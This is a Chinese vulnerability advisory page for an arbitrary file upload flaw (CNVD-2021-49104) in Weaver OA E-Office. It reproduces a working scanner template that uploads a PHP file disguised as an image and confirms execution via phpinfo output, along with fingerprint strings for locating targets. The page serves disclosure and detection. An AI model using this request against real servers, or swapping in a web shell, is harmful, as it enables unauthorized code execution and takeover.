CNVD-2021-49104: 泛微OA E-Office UploadFile.php 任意文件上传漏洞

日期: 2025-09-01 | 影响软件: 泛微OA E-Office | POC: 已公开

漏洞描述

在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限 app="泛微-协同办公OA" || app="Weaver-OA"

PoC代码[已公开]

id: CNVD-2021-49104

info:
  name: 泛微OA E-Office UploadFile.php 任意文件上传漏洞
  author: zan8in
  severity: critical
  description: |
    在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限
    app="泛微-协同办公OA" || app="Weaver-OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20UploadFile.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%20CNVD-2021-49104.html

set:
    rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"Filedata\"; filename=\"cmd.php\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        <?php phpinfo();?>\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 200 
  r1:
    request:
      method: GET
      path: /images/logo/logo-eoffice.php
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version')
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-49104.yaml

相关漏洞推荐